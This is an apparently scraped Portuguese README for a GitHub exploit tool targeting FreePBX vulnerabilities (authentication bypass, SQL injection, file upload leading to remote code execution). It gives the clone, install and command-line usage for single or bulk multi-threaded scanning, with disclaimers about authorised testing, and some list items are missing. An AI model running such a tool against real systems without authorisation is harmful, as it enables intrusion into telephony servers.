
Esta vulnerabilidade permite que atacantes remotos, tanto autenticados quanto não autenticados, executem código remoto em instâncias FreePBX vulneráveis. Esses problemas foram corrigidos nas versões 16.0.42, 16.0.92, 17.0.6 e 17.0.22 do FreePBX. É importante observar que essa vulnerabilidade de bypass de autenticação não está presente na configuração padrão do FreePBX.
APENAS PARA FINS EDUCACIONAIS E TESTES AUTORIZADOS
AO USAR ESTA FERRAMENTA, VOCÊ CONCORDA EM USÁ-LA DE FORMA LEGAL E ÉTICA.
Uma ferramenta de avaliação de segurança para detetar vulnerabilidades críticas em sistemas FreePBX.
requirements.txt para dependênciasgit clone https://github.com/BimBoxH4/CVE-2025-66039_CVE-2025-61675_CVE-2025-61678_reePBX.git
cd CVE-2025-66039_CVE-2025-61675_CVE-2025-61678_reePBX
pip3 install -r requirements.txt
# Scan de alvo único
python3 exploit.py -u http://target-ip
# Múltiplos alvos com threads
python3 exploit.py -l targets.txt -t 10
# Modo de depuração
python3 exploit.py -u http://target-ip -d
# Guardar resultados
python3 exploit.py -l targets.txt -o results.txt
# Todas as verificações (padrão)
python3 exploit.py -u http://target-ip --mode all
# Apenas upload de ficheiro
python3 exploit.py -u http://target-ip --mode upload
# Apenas injeção SQL
python3 exploit.py -u http://target-ip --mode sql
# Apenas bypass de autenticação
python3 exploit.py -u http://target-ip --mode auth
http://192.168.1.100
http://192.168.1.101
https://freepbx.example.com
# Comentários começam com #
Use esta ferramenta apenas se:
Nunca:
⚠️ LEMBRE-SE: Acesso não autorizado é ilegal. Use com responsabilidade!
| Argumento | Descrição |
|---|
-u, --url | URL do alvo único |
-l, --list | Ficheiro com URLs dos alvos (um por linha) |
-t, --threads | Número de threads (padrão: 1) |
-o, --output | Ficheiro de saída para resultados |
-d, --debug | Ativar modo de depuração |
--mode | Modo de scan: all, upload, sql, auth |